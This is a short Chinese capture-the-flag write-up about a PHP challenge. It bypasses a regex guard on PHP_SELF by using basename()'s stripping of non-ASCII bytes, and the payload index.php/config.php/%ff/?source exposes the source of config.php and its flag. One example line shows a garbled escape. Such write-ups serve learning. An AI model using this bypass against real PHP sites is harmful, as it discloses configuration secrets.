题目场景
可以读到源码
<?php
include 'config.php'; // FLAG is defined in config.php
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("I don't know what you are thinking, but I won't let you read it :)");
}
if (isset($_GET['source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}
$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
$guess = (string) $_POST['guess'];
if (hash_equals($secret, $guess)) {
$message = 'Congratulations! The flag is: ' . FLAG;
} else {
$message = 'Wrong.';
}
}
?>
想绕过下面的比较却卡了很久,所以把目标转移到上面
base()可以返回路径中的文件名部分 如果传入/index.php/config.php/
,则$_SERVER['PHP_SELF']
返回/index.php/config.php/
,basename($_SERVER['PHP_SELF'])
返回config.php
验证:
成功了,接下来就是绕过正则过滤,测试过换行符但是没有效果,这里用basename()的第二个特性
https://bugs.php.net/bug.php?id=62119
var_dump(basename("xffconfig.php")); // => config.php
var_dump(basename("config.php/xff")); // => config.php
basename()会去掉非ascii字符。
payload:
index.php/config.php/%ff/?source
参考
https://blog.csdn.net/qq_43801002/article/details/105835367